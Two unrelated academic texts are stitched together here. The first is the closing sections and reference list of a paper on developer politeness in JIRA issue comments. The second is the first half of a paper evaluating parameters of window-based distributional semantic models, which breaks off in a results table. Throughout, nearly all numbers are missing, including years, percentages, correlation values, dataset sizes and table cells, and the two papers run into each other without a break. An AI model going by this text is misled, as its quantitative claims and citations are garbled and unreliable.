someone is asked to accomplish a task in a polite way, there is higher possibility for a relaxed collaboration and faster results. on the other hand, impolite requests can easily generate discomfort, stress and burnout, often negatively impacting the actual time taken to complete a given task. surprisingly, mixed issues (commented with both polite and impolite comments) presented longer fixing time than impolite issues. the mixed interaction ‘polite-impolite’ between developers could explain this fact. ortu et al. 
( ) showed that when in the presence of impolite or negative comments, the probability of the next comment being impolite or negative was % and %, respectively. hence part of the longer time could be spent in trying to shift the exchange of comments toward a (more) polite level. for example, in a small study of a single project with two deadlines (guzman, b), the authors find that, as deadlines came closer, more and longer emails were exchanged with higher emotional intensity. the lower fixing time for impolite issues (compared to the fixing time of mixed issues) could also be related to the fact that developers (especially newcomers) being addressed with impolite comments can react faster because they feel emotionally pushed and want to show (to the community) that they are able to accomplish a task. as a second point, we showed that a positive correlation existed between the percentage of polite comments and magnetism and stickiness of a project. for each project in the corpus, we first calculated the percentage of polite comments per month and the value of magnetism and stickiness, generating three time series. we studied each time series for stationarity and then performed correlation analysis. we found that the percentage of polite comments is, for the majority of the project in our corpus, positive correlated with magnetism and stickiness. however, we need to point out that the first cross correlation analysis performed for the non-stationary series presented weak correlation values (< . ). higher correlation values were found after the cross correlation analysis of the stationary series (after differencing). the attractiveness of a project is indeed a complex phenomenon and there are different confounding factors (fame and importance of the project could be perceived also as a status-symbol, e.g., being part of the linux developers community) of which politeness among developers can be part of. further analysis on a larger corpus of projects are required. our findings highlight the fact that politeness might be a factor affecting the attractiveness of a project. third, we found that the percentage of polite comments over time was (for the majority of the projects in our corpus) seasonal and not random. this is an interesting (and somewhat expected) fact that could help managers and developers in better understanding destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the development process. further experiments are required to better analyse the links between seasonality and deadlines that developers face during the development phases. higher workload could lead to lower politeness, while normal activities can be linked with higher politeness. fourth, we studied how politeness varied with respect to jira maintenance types and issue priorities. again, the results match common sense. bug issues maintenance were those with lower politeness. when something is broken and needs to be fixed, the situation is less attractive and could generate impolite reactions. on the contrary, new feature issues maintenance were the ones with higher politeness; those kind of issues indicate a new feature yet to be developed, hence, there might be higher enthusiasm among developers (a developer can be the first one who started working for a new feature; the level of freedom felt for the task can be higher leading to higher politeness) when dealing with such issues. 
regarding issue priority, critical and blocker issues were the categories with higher politeness, while trivial issues were those characterised by lower politeness. again, this is what one would expect, since critical issues are both important and challenging, while trivial issues might be related to minor programming mistakes and/or poor knowledge of programming practices knowing when lower politeness will occur can help managers in taking actions aimed at keeping the general mood high and relaxed, lowering and preventing conflicts, obtaining higher productivity as a result. the results presented in this study can be also helpful when defining a team of developers. knowing the profile (from a politeness point of view) of the developers can provide hints for creating balanced teams. a jira plug-in able to present the politeness level of the communication flow in a graphical way (e.g., cockpit view) could help both developers and managers in constantly monitoring the general mood of the developers working for a company or for a project (in the case of open source collaboration paradigm). threats to validity threats to external validity correspond to the generalisation of our results (campbell & stanley, ). in this study, we analysed comments from issue reports from open source projects. our results cannot be representative of all environments or programming languages, we considered only open-source systems and this could affect the generality of the study. commercial software is usually developed using different platforms and technologies, by developers with different knowledge and background, with strict deadlines and cost limitations. replication of this work on other open source systems and on commercial projects are needed to confirm our findings. also, the politeness tool can be subject to bias due the domain used to train the machine learning classifier. threats to internal validity concern confounding factors that can influence the obtained results. based on empirical evidence, we suppose a relationship between the emotional state of developers and what they write in issue reports (pang & lee, ). since the main goal of developer communication is the sharing of information, the consequence of removing or camouflaging emotions may make comments less meaningful and cause misunderstanding. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this work is focused on sentences written by developers for developers. to illustrate the influence of these comments, it is important to understand the language used by developers. we believe that the tool used for measuring politeness danescu-niculescu-mizil et al. ( ) is valid in the software engineering domain, since the developers also used requests posted on stack overflow to train the classifier. the comments used in this study were collected over an extended period from developers unaware of being monitored. for this reason, we are confident that the emotions we analyzed were genuine. we do not claim any causality between politeness and the issue resolution time, but we built an explanatory model to understand the characteristics of issues with short and long fixing time. confounds could have affected validity of the results for rq about lower issue fixing time for polite and mixed issues. the number of developers involved in discussing issues might differ, as well as severity and complexity of an issue under analysis. 
another threat to validity is related to classification of jira issue types. as highlighted by herzig, just & zeller ( ) the categorisation of issue reports is dependent on the perspective of the observer. this fact could affect the results obtained for research question . threats to construct validity focus on how accurately the observations describe the phenomena of interest. the detection of emotions from issue reports presents difficulties due to vagueness and subjectivity. the politeness measures are approximated and cannot perfectly identify the precise context, given the challenges of natural language and subtle phenomena like sarcasm. conclusions and future work software engineers have been trying to measure software to gain quantitative insights into its properties and quality since its inception. in this paper, we present the results about politeness and attractiveness on open-source software projects developed using the agile board of the jira repository. our results show that the level of politeness in the communication process among developers does have an effect on both the time required to fix issues and the attractiveness of the project to both active and potential developers. the more polite developers were, the less time it took to fix an issue. in the majority of cases, the more the developers wanted to be part of project, the more they were willing to continue working on the project over time. this work is a starting point and further research on a larger number of projects is needed to validate our findings especially, considering proprietary software developed by companies, different programming languages and different dimension. the development of proprietary software follows different dynamics (e.g., strict deadlines and given budget) and this fact could lead to different results. we started the development of an application which will be able to automatically analyse all the comments on a issue tracking systems (as we have done for this paper) and will provide reports and data to managers, team-leaders and/or developers interested in understanding the health of a project from a ‘‘mood’’ point of view. the takeaway message is that politeness can only have a positive effect on a project and on the development process. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements the authors would like to thank the anonymous reviewers for their valuable comments and suggestions to improve the quality of the paper. additional information and declarations funding the research presented in this paper was partly funded by the engineering and physical sciences research council (epsrc) of the uk under grant ref: ep/m / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: engineering and physical sciences research council (epsrc): ep/m / . competing interests the authors declare there are no competing interests. author contributions • giuseppe destefanis, marco ortu and steve counsell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. 
• stephen swift performed the experiments, analyzed the data, contributed reagents/ma- terials/analysis tools, performed the computation work, reviewed drafts of the paper. • michele marchesi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • roberto tonelli performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: we used a public dataset available at http://openscience.us/repo/social-analysis/social- aspects.html, and all the scripts we prepared (along with the raw data) can be found at bitbucket: https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ references acuña st, gómez m, juristo n. . towards understanding the relationship between team climate and software quality—a quasi-experimental study. empirical software engineering ( ): – doi . /s - - - . destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://openscience.us/repo/social-analysis/social-aspects.html http://openscience.us/repo/social-analysis/social-aspects.html https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. allen nj, hecht td. . the ‘romance of teams’: toward an understanding of its psychological underpinnings and implications. journal of occupational and orga- nizational psychology ( ): – doi . / . amabile t, barsade sg, mueller js, staw bm. . affect and creativity at work. administrative science quarterly ( ): – doi . /asqu. . . . . banerjee a, dolado jj, galbraith jw, hendry d, et al. . co-integration, error correction, and the econometric analysis of non-stationary data. oup catalogue. bartels r. . the rank version of von neumann’s ratio test for randomness. journal of the american statistical association ( ): – doi . / . . . bazelli b, hindle a, stroulia e. . on the personality traits of stack overflow users. in: software maintenance (icsm), th ieee international conference on. piscataway: ieee, – . beck k, beedle m, van bennekum a, cockburn a, cunningham w, fowler m, grenning j, highsmith j, hunt a, jeffries r, kern j. . manifesto for agile software development. available at http://www.agilemanifesto.org. box ge, pierce da. . distribution of residual autocorrelations in autoregressive- integrated moving average time series models. journal of the american statistical association ( ): – doi . / . . . brief ap, weiss hm. . organizational behavior: affect in the workplace. annual review of psychology ( ): – doi . /annurev.psych. . . . brockwell pj, davis ra. . introduction to time series and forecasting. new york: springer science & business media. campbell dt, stanley jc. . experimental and quasi-experimental designs for generalized causal inference. boston: houghton mifflin. capretz lf. . personality types in software engineering. international journal of human-computer studies ( ): – doi . /s - ( ) - . cockburn a, highsmith j. . agile software development: the people factor. computer : – . curtis b, krasner h, iscoe n. . a field study of the software design process for large systems. communications of the acm ( ): – doi . / . . danescu-niculescu-mizil c, sudhof m, jurafsky d, leskovec j, potts c. . a com- putational approach to politeness with application to social factors. in: proceedings of acl. diebold fx, rudebusch gd. . on the power of dickey-fuller tests against fractional alternatives. 
economics letters ( ): – doi . / - ( ) -f. ehlers j. . socialness in the recruiting of software engineers. in: proceedings of the th acm international conference on computing frontiers. new york: acm, . erez a, isen am. . the influence of positive affect on the components of expectancy motivation. journal of applied psychology ( ): – doi . / - . . . . fagerholm f, ikonen m, kettunen p, münch j, roto v, abrahamsson p. . how do software developers experience team performance in lean and agile environments? destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /asqu. . . . http://dx.doi.org/ . / . . http://www.agilemanifesto.org http://dx.doi.org/ . / . . http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) -f http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. in: proceedings of the th international conference on evaluation and assessment in software engineering. new york: acm, . feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering: empirical studies should collect psychometrics. in: proceedings of the international workshop on cooperative and human aspects of software engineering. new york: acm, – . garcia d, zanetti ms, schweitzer f. . the role of emotions in contributors activity: a case study on the gentoo community. in: cloud and green computing (cgc), third international conference on. piscataway: ieee, – . gómez mn, acuña st, genero m, cruz-lemus ja. . how does the extraversion of software development teams influence team satisfaction and software quality? a controlled experiment. international journal of human capital and information technology professionals (ijhcitp) ( ): – doi . /jhcitp. . graziotin d, wang x, abrahamsson p. . happy software developers solve problems better: psychological measurements in empirical software engineering. peerj :e doi . /peerj. . graziotin d, wang x, abrahamsson p. . how do you feel, developer? an explana- tory theory of the impact of affects on programming performance. peerj computer science :e doi . /peerj-cs. . guzman e. a. visualizing emotions in software development projects. in: st ieee working conference on software visualization—proceedings of vissoft . piscataway: ieee, – . guzman e. b. visualizing emotions in software projects. in: software visualization (vissoft), first ieee working conference on. piscataway: ieee, – . guzman e, azócar d, li y. . sentiment analysis of commit comments in github: an empirical study. in: proceedings of the th working conference on mining software repositories—msr . new york: acm press, – . guzman e, bruegge b. . towards emotional awareness in software development teams. in: proceedings of the th joint meeting on foundations of software engineering. new york: acm press, – . hamilton jd. . time series analysis, vol. . princeton university press princeton. herzig k, just s, zeller a. . it’s not a bug, it’s a feature: how misclassification impacts bug prediction. in: proceedings of the international conference on software engineering. piscataway: ieee press, – . jongeling r, datta s, serebrenik a. . choosing your weapons: on sentiment analysis tools for software engineering research. in: software maintenance and evolution (icsme), ieee international conference on. piscataway: ieee, – . kaluzniacky e. . managing psychological factors in information systems work: an orientation to emotional intelligence. hershey: igi global. 
a large scale evaluation of distributional semantic models: parameters, interactions and model selection

gabriella lapesa, institut für kognitionswissenschaft, universität osnabrück, osnabrück, germany (gabriella.lapesa@fau.de)
stefan evert, professur für korpuslinguistik, fau erlangen-nürnberg, erlangen, germany (stefan.evert@fau.de)

abstract

this paper presents the results of a large-scale evaluation study of window-based distributional semantic models on a wide variety of tasks. our study combines a broad coverage of model parameters with a model selection methodology that is robust to overfitting and able to capture parameter interactions. we show that our strategy allows us to identify parameter configurations that achieve good performance across different datasets and tasks.

introduction

distributional semantic models (dsms) are employed to produce semantic representations of words from co-occurrence patterns in texts or documents (sahlgren, ; turney and pantel, ). building on the distributional hypothesis (harris, ), dsms quantify the amount of meaning shared by words as the degree of overlap of the sets of contexts in which they occur. a widely used approach operationalizes the set of contexts as co-occurrences with other words within a certain window. a window-based dsm can be represented as a co-occurrence matrix in which rows correspond to target words, columns correspond to context words, and cells store the co-occurrence frequencies of target and context words. the co-occurrence information is usually weighted by some scoring function and the rows of the matrix are normalized. since the co-occurrence matrix tends to be very large and sparsely populated, dimensionality reduction techniques are often used to obtain a more compact representation. landauer and dumais ( ) claim that dimensionality reduction also improves the semantic representation encoded in the co-occurrence matrix. finally, distances between the row vectors of the matrix are computed and, according to the distributional hypothesis, interpreted as a correlate of the semantic similarities between the corresponding target words. (the analysis presented in this paper is complemented by supplementary materials, which are available for download at http://www.linguistik.fau.de/dsmeval/; this page will also be kept up to date with the results of follow-up experiments.)

the construction and use of a dsm involves many design choices, such as: selection of a source corpus; size of the co-occurrence window; choice of a suitable scoring function, possibly combined with an additional transformation; whether to apply dimensionality reduction, and the number of reduced dimensions; and the metric for measuring distances between vectors. different design choices (technically, the dsm parameters) can result in quite different similarities for the same words (sahlgren, ). dsms have already proven successful in modeling lexical meaning: they have been applied in natural language processing (schütze, ; lin, ), information retrieval (salton et al., ), and cognitive modeling (landauer and dumais, ; lund and burgess, ; padó and lapata, ; baroni and lenci, ).
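To make the pipeline described above concrete (count co-occurrences within a word window, weight and normalize the rows, then compare row vectors), the following minimal Python sketch builds a frequency-weighted, window-based co-occurrence matrix from a toy corpus and computes cosine similarities. The corpus, the window size of 2, and the use of plain frequency with no dimensionality reduction are simplifying assumptions of this sketch, not the setup evaluated in the study.

import numpy as np

# Toy corpus: each sentence is a list of tokens (purely illustrative).
corpus = [
    "the cat chased the mouse".split(),
    "the dog chased the cat".split(),
    "a mouse ate the cheese".split(),
]

vocab = sorted({w for sentence in corpus for w in sentence})
idx = {w: i for i, w in enumerate(vocab)}
window = 2  # undirected context window of +/- 2 tokens

# Co-occurrence matrix: rows = target words, columns = context words.
counts = np.zeros((len(vocab), len(vocab)))
for sentence in corpus:
    for i, target in enumerate(sentence):
        lo, hi = max(0, i - window), min(len(sentence), i + window + 1)
        for j in range(lo, hi):
            if j != i:
                counts[idx[target], idx[sentence[j]]] += 1.0

# Here the "scoring function" is plain co-occurrence frequency; rows are
# L2-normalized, so the dot product of two rows is their cosine similarity.
norms = np.linalg.norm(counts, axis=1, keepdims=True)
vectors = counts / np.where(norms == 0.0, 1.0, norms)

def cosine_similarity(a, b):
    """Cosine similarity between the normalized row vectors of words a and b."""
    return float(vectors[idx[a]] @ vectors[idx[b]])

print(cosine_similarity("cat", "mouse"), cosine_similarity("cat", "cheese"))

In a realistic setting the raw counts would be re-weighted by an association score, optionally transformed, and possibly reduced with SVD before distances are computed; that is exactly the parameter space explored below.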
recently, the field of dis- tributional semantics has moved towards new chal- lenges, such as predicting brain activation (mitchell et al., ; murphy et al., ; bullinaria and levy, ) and modeling meaning composition (baroni et al., , and references therein). despite such progress, a full understanding of the different parameters governing a dsm and their in- fluence on model performance has not been achieved yet. the present paper is a contribution towards this transactions of the association for computational linguistics, vol. , pp. – , . action editor: janyce wiebe. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. goal: it presents the results of a large-scale evalua- tion of window-based dsms on a wide variety of se- mantic tasks. more complex tasks building on distri- butional representations (e.g., vector composition or relational analogies) will also benefit from our find- ings, allowing them to choose optimal parameters for the underlying word-level dsms. at the level of parameter coverage, this work eval- uates most of the relevant parameters considered in comparable state-of-the-art studies (bullinaria and levy, ; bullinaria and levy, ); it also in- troduces an additional one, which has received lit- tle attention in the literature: the index of distribu- tional relatedness, which connects distances in the dsm space to semantic similarity. we compare direct use of distance measures to neighbor rank. neighbor rank has already been successfully used to model priming effects with dsms (hare et al., ; lapesa and evert, ); the present study extends its evaluation to standard tasks. we show that neigh- bor rank consistently improves the performance of dsms compared to distance, but the degree of this improvement varies from task to task. at the level of task coverage, the present study includes most of the standard datasets used in com- parative studies (bullinaria and levy, ; baroni and lenci, ; bullinaria and levy, ). we consider three types of evaluation tasks: multiple choice (toefl test), correlation to human similar- ity ratings, and semantic clustering. at the level of methodology, our work adopts the approach to model selection proposed by lapesa and evert ( ), which is described in detail in section . our results show that parameter interactions play a crucial role in determining model performance. this paper is structured as follows. section briefly reviews state-of-the-art studies on dsm eval- uation. section describes the experimental setting in terms of tasks and evaluated parameters. sec- tion outlines our methodology for model selection. in section we report the results of our evaluation study. finally, section summarizes the main find- ings and sketches ongoing and future work. previous work in this section we summarize the results of previous evaluation studies of distributional semantic mod- els. among the existing work on dsm evaluation, we can identify two main types of approaches. one possibility is to evaluate a distributional model with certain new features on a range of tasks, applying little or no parameter tuning, and to com- pare it to competing models; examples are pado and lapata’s ( ) dependency vectors as well as baroni and lenci’s ( ) distributional mem- ory. since both studies focus on testing a single new model with fixed parameters (or a small number of new models), we will not go into further detail con- cerning them. 
alternatively, the evaluation may be conducted via incremental tuning of parameters, which are tested sequentially to identify their best perform- ing values on a number of tasks, as has been done by bullinaria and levy ( ; ), polajnar and clark ( ), and kiela and clark ( ). bullinaria and levy ( ) report on a system- atic study of the impact of a number of parame- ters (shape and size of the co-occurrence window, distance metric, association score for co-occurrence counts) on a number of tasks (including the toefl synonym task, which is also evaluated in our study). evaluated models were based on the british na- tional corpus. bullinaria and levy ( ) found that vectors scored with pointwise mutual informa- tion, built from very small context windows with as many context dimensions as possible, and using co- sine distance ensured the best performance across all tasks at issue. bullinaria and levy ( ) extend the evaluation reported in bullinaria and levy ( ). starting from the optimal configuration identified in the first study, they test the impact of three further parame- ters: application of stop-word lists, stemming, and dimensionality reduction using singular value de- composition. dsms were built from the ukwac corpus, and evaluated on a number of tasks (includ- ing toefl and noun clustering on the dataset of mitchell et al. ( ), also evaluated in our study). neither stemming nor the application of stop-word lists resulted in a significant improvement of dsm performance. positive results were achieved by per- forming svd dimensionality reduction and discard- ing the initial components of the reduced matrix. polajnar and clark ( ) evaluate the impact of context selection (for each target, only the most rel- evant context words are selected, and the remaining vector entries are set to zero) and vector normaliza- tion (used to vary model sparsity and the range of values of the dsm vectors) in standard tasks related to word and phrase similarity. context selection and normalization improved dsm performance on word similarity and compositional tasks, both with and without svd. kiela and clark ( ) evaluate window-based and dependency-based dsms on a variety of tasks related to word and phrase similarity. a wide range of parameters are involved in this study: source corpus, window size, number of context dimen- sions, use of stemming, lemmatization and stop- words, similarity metric, score for feature weight- ing. best results were obtained with large corpora and small window sizes, around context di- mensions, stemming, positive mutual information, and a mean-adjusted version of cosine distance. even though we adopt a different approach than these incremental tuning studies, there is consider- able overlap in the evaluated parameters and tasks, which will be pointed out in section . an alternative to incremental tuning is the methodology proposed by lapesa and evert ( ) and lapesa et al. ( ). they systematically test a large number of parameter combinations and use linear regression to determine the importance of in- dividual parameters and their interactions. as their evaluation methodology is adopted in the present work and described in more detail in section , we will not discuss it here and instead focus on the main results. dsms are evaluated in the task of modeling semantic priming. this task, albeit not standard in dsm evaluation, is of great interest as priming ex- periments provide a window into the structure of the mental lexicon. 
both studies showed that neighbor rank outperforms distance in capturing priming ef- fects. they also found that the scoring function has a crucial influence on model performance and inter- acts strongly with an additional logarithmic transfor- mation. lapesa et al. ( ) focused on a compari- son of syntagmatic and paradigmatic relations. they found that discarding the initial svd dimensions is only benefical for certain relations, suggesting that these dimensions may encode syntagmatic informa- tion if larger context windows are used. concerning the scope of the evaluation, both studies consider a wide range of parameters but target only a very spe- cific task. our study aims at extending their parame- ter set and evaluation methodology to standard tasks. experimental setting . tasks the evaluation of dsms has been conducted on three standard types of semantic tasks. the first task is a multiple choice setting: distri- butional relatedness between a target word and two or more other words is used to select the best, i.e. most similar candidate. performance in this task is quantified by the decision accuracy. the evaluated dataset is the well-known toefl multiple-choice synonym test (landauer and dumais, ), which was also included in the studies of bullinaria and levy ( ; ) and kiela and clark ( ). in the second task, we measure the correla- tion between distributional relatedness and native speaker judgments of semantic similarity or related- ness. following previous studies (baroni and lenci, ; padó and lapata, ), performance in this task is quantified in terms of pearson correlation. evaluated datasets are the rubenstein and goode- nough dataset (rg ) of noun pairs (rubenstein and goodenough, ), also evaluated by kiela and clark ( ), and the wordsim- dataset (ws ) of noun pairs (finkelstein et al., ), included in the study of polajnar and clark ( ). the third evaluation task is noun clustering: distributional similarity between words is used to assign them to a pre-defined number of semantic classes. performance in this task is quantified in terms of cluster purity. clustering is performed with an algorithm based on partitioning around medoids (kaufman and rousseeuw, , ch. ), using the the parameter set of lapesa et al. ( ) fully corresponds to the one used in the present study. some other evaluation studies adopt spearman’s rank cor- relation ρ , which is more appropriate if there is a non-linear re- lation between distributional relatedness and the human judge- ments. we computed both coefficients in our experiments and decided to report pearson’s r for three reasons: (i) baroni and lenci ( ) already list r scores for a wide range of dsms in this task; (ii) in most experimental runs, ρ and r values were quite similar, with a tendency for ρ to be slightly lower then r (difference of means rg : . ; ws : . ); (iii) lin- ear regression analyses for ρ and r showed the same trends and patterns for all dsm parameters. r function pam with standard settings. evaluated datasets for the clustering task are the almuhareb- poesio set (henceforth, ap) containing nouns grouped into classes (almuhareb, ); the bat- tig set, containing concrete nouns grouped into classes (van overschelde et al., ); the ess- lli set, containing concrete nouns grouped into classes; and the mitchell set, containing nouns grouped into classes (mitchell et al., ), also employed by bullinaria and levy ( ). . parameters dsms evaluated in this paper belong to the class of window-based models. 
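Stepping back briefly to the three tasks just described, the corresponding performance measures (multiple-choice accuracy, correlation with human similarity ratings, and cluster purity) can each be computed in a few lines. The data in the sketch below are made-up placeholders, and the purity function implements the usual majority-class definition, which is assumed here rather than spelled out in the text.

import numpy as np
from scipy.stats import pearsonr, spearmanr

# 1) Multiple-choice accuracy (TOEFL-style): the model's pick vs. the correct synonym.
predicted = ["enormous", "quick", "fake"]
gold = ["enormous", "quick", "genuine"]
accuracy = float(np.mean([p == g for p, g in zip(predicted, gold)]))

# 2) Correlation with human similarity ratings (RG / WordSim-style word pairs).
model_scores = np.array([0.9, 0.2, 0.5, 0.7])    # model relatedness per word pair
human_ratings = np.array([8.5, 1.0, 4.0, 6.5])   # human judgments per word pair
r, _ = pearsonr(model_scores, human_ratings)
rho, _ = spearmanr(model_scores, human_ratings)

# 3) Cluster purity: each induced cluster is credited with its majority gold class.
def purity(cluster_ids, gold_classes):
    total = 0
    for c in set(cluster_ids):
        members = [g for cid, g in zip(cluster_ids, gold_classes) if cid == c]
        total += max(members.count(g) for g in set(members))
    return total / len(gold_classes)

print(accuracy, r, rho, purity([0, 0, 1, 1, 1], ["A", "A", "B", "B", "A"]))

Spearman's rho is computed alongside Pearson's r because, as noted above, the two coefficients can diverge when the relation between model scores and ratings is non-linear.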
all models use the same large vocabulary of target words ( lemma types), which is based on the vocabulary of distri- butional memory (baroni and lenci, ) and has been extended to cover all items in our datasets. dis- tributional models were built using the ucs toolkit and the wordspace package for r (evert, ). the following parameters have been evaluated: • source corpus (abbreviated in the plots as cor- pus): the corpora from which we compiled our dsms differ in both size and quality, and they rep- resent standard choices in dsm evaluation. eval- uated corpora in this study are: british national corpus ; ukwac; wackypedia en ; • context window: – direction* (win.direction): we collected co- occurrence counts both using a directed win- dow (i.e., separate co-occurrence counts for other clustering studies have often been carried out us- ing the cluto toolkit (karypis, ) with standard settings, which corresponds to spectral clustering of the distributional vectors. unlike pam, which operates on a pre-computed dis- similarity matrix, cluto cannot be used to test different dis- tance measures or neighbor rank. comparative clustering ex- periments showed no substantial differences for cosine similar- ity; in the rank-based setting, pam consistently outperformed cluto clustering. http://wordspace.collocations.de/doku.php/data: esslli :concrete nouns categorization http://www.collocations.de/software.html parameters also evaluated by bullinaria and levy ( ; ), albeit with a different range of values, are marked with an asterisk (*); those evaluated by kiela and clark ( ) and/or polajnar and clark ( ) are marked with a dagger (†). http://www.natcorp.ox.ac.uk/ both ukwac and wackypedia en are available from http: //wacky.sslmit.unibo.it/doku.php?id=corpora. context words to the left and to the right of the target) and an undirected window (no distinc- tion between left and right context); – size (win.size)*†: we expect this parameter to be crucial as it determines the amount of shared context involved in the computation of similar- ity. we tested windows of , , , , and words to the left and right of the target, limited by sentence boundaries; • context selection: context words are filtered by part-of-speech (nouns, verbs, adjectives, and ad- verbs). from the full co-occurrence matrix, we further select dimensions (i.e., columns, corre- sponding to context words) according to the fol- lowing two parameters: – criterion for context selection (criterion): marginal frequency; number of nonzero co- occurrence counts; – threshold for context selection (con- text.dim)*†: from the context dimensions ranked according to this criterion, we select the top , , , or dimensions; • score for feature weighting (score)*†: we com- pare plain co-occurrence frequency to tf.idf and to the following association measures: dice coeffi- cient; simple log-likelihood; mutual information (mi); t-score; z-score; • feature transformation (transformation): to re- duce the skewness of feature scores, it is possible to apply a transformation function. we evaluate square root, sigmoid (tanh) and logarithmic trans- formation vs. no transformation. see evert ( ) for a thorough description of the asso- ciation measures and details on their calculation (fig. . on p. and fig. . on p. ). we selected these measures because they have widely been used in previous work on dsms (tf.idf, mi and log-likelihood) or are popular choices for the identification of multiword expressions. 
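As an illustration of the "sparse" association scores just described (negative values clamped to zero, so that MI becomes positive MI), here is a minimal sketch of positive pointwise mutual information together with the four feature transformations evaluated in the study. The exact formulas of simple-ll, t-score and z-score follow Evert's conventions and are not reproduced here; writing the log transformation as log(1 + x), so that zero cells stay zero, is likewise an assumption of this sketch rather than a detail given in the text.

import numpy as np

def positive_pmi(counts):
    """Pointwise mutual information with negative values clamped to zero,
    which preserves the sparsity of the co-occurrence matrix."""
    total = counts.sum()
    row = counts.sum(axis=1, keepdims=True)   # target marginals
    col = counts.sum(axis=0, keepdims=True)   # context marginals
    with np.errstate(divide="ignore", invalid="ignore"):
        ratio = counts * total / (row * col)  # observed / expected frequency
        pmi = np.where(counts > 0, np.log2(ratio), 0.0)
    return np.maximum(pmi, 0.0)

# Feature transformations evaluated in the study: none, logarithmic,
# square root, sigmoid (tanh).
transformations = {
    "none": lambda x: x,
    "log": np.log1p,   # log(1 + x): keeps zero cells at zero (sketch choice)
    "root": np.sqrt,
    "sigmoid": np.tanh,
}

counts = np.array([[10.0, 0.0, 2.0],
                   [1.0, 5.0, 0.0],
                   [0.0, 3.0, 8.0]])
scored = transformations["log"](positive_pmi(counts))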
based on statistical hy- pothesis tests, log-likelihood, t-score and z-score measure the significance of association between a target and feature term; mi shows how much more frequently they co-occur than ex- pected by chance; and dice captures the mutual predictability of target and feature term. note that we compute sparse ver- sions of the association measures with negative values clamped to zero in order to preserve the sparseness of the co-occurrence matrix. for example, our mi measure corresponds to positive mi in the other evaluation studies. • distance metric (metric)*†: cosine distance (i.e., angle between vectors); manhattan distance ; • dimensionality reduction: we optionally apply singular value decomposition to dimen- sions, using randomized svd (halko et al., ) for performance reasons. for the svd-based models, there are two additional parameters: – number of latent dimensions (red.dim): out of the svd dimensions, we select the first , , , , dimensions (i.e. those with the largest singular values); – number of skipped dimensions (dim.skip): when selecting the reduced dimensions, we ex- clude the first , or dimensions. this parameter has already been evaluated by bulli- naria and levy ( ), who achieved best per- formance by discarding the initial components of the reduced matrix, i.e., those with the high- est variance. • index of distributional relatedness (rel.index). given two words a and b represented in a dsm, we consider two alternative ways of quantify- ing the degree of relatedness between a and b. the first option (and standard in dsm model- ing) is to compute the distance (cosine or man- hattan) between the vectors of a and b. the al- ternative choice, proposed in this work, is based on neighbor rank. neighbor rank has already been successfully used for capturing priming ef- fects (hare et al., ; lapesa and evert, ; lapesa et al., ) and for quantifying the se- mantic relatedness between derivationally related words (zeller et al., ); however, its perfor- mance on standard tasks has not been tested yet. for the toefl task, we compute rank as the po- sition of the target among the nearest neighbors of each synonym candidate. for the correla- in this study, the range of evaluated metrics is restricted to cosine vs. manhattan for a number of reasons: (i) cosine is con- sidered a standard choice in dsm modeling and is adopted by most evaluation studies (bullinaria and levy, ; bullinaria and levy, ; polajnar and clark, ); (ii) for our normal- ized vectors, euclidean distance is fully equivalent to cosine; (iii) preliminary experiments with the maximum distance mea- sure resulted in very low performance. note that using the positions of the synonym candidates among the neighbors of the target would have been equivalent to direct use of the distance measure, since the transformation from distance to rank is monotonic in this case. tion and clustering tasks, we compute a symmetric rank measure as the average of log rank(a,b) and log rank(b,a). an exploration of the effects of di- rectionality on the prediction of similarity ratings and its use in clustering tasks (i.e., experiments involving rank(a,b) and rank(b,a) as indexes of relatedness) is left for future work. model selection as has already been pointed out in the introductory section, one of the main open issues in dsm eval- uation is the need for a systematic investigation of the interactions between dsm parameters. 
another issue that large-scale evaluation studies face is over- fitting: if a large number of models (i.e. parameter combinations) is evaluated, it makes little sense to look at the best model (i.e. the best parameter com- bination), which will be subject to heavy overfit- ting, especially on small datasets such as toefl. the methodology for model selection applied in this work successfully addresses both issues. in our evaluation study, we tested all possible combinations of the parameters described in sec- tion . . this resulted in a total of model runs ( in the unreduced setting, in the dimensionality-reduced setting). the models were generated and evaluated on a large hpc cluster within approximately weeks. following lapesa and evert ( ), dsm pa- rameters are considered predictors of model perfor- mance: we analyze the influence of individual pa- rameters and their interactions using general linear models with performance (accuracy, correlation, pu- rity) as a dependent variable and the model parame- ters as independent variables, including all two-way interactions. more complex interactions are beyond the scope of this paper and are left for future work. analysis of variance – which is straightforward for our full factorial design – is used to quantify the im- portance of each parameter or interaction. robust optimal parameter settings are identified with the help of effect displays (fox, ), which show the partial effect of one or two parameters by marginal- izing over all other parameters. unlike coefficient estimates, they allow an intuitive interpretation of the effect sizes of categorical variables irrespective of the dummy coding scheme used. results this section reports the results of the modeling ex- periments outlined in section . table summarizes the evaluation results: for each dataset, we report minimum, maximum and mean performance, com- paring unreduced and reduced runs. the column difference of means shows the average difference in performance between an unreduced model and its reduced counterpart (with dimensionality reduction parameters set to the values of the general best set- ting identified in section . ) and the p-value of a wilcoxon signed rank test with continuity correc- tion.it is evident that dimensionality reduction im- proves model performances for all datasets . dataset unreduced reduced difference min max mean min max mean of means toefl . . . . . . − . *** rg . . . . . . − . *** ws . . . . . . − . *** ap . . . . . . . n.s. battig . . . . . . − . *** esslli . . . . . . 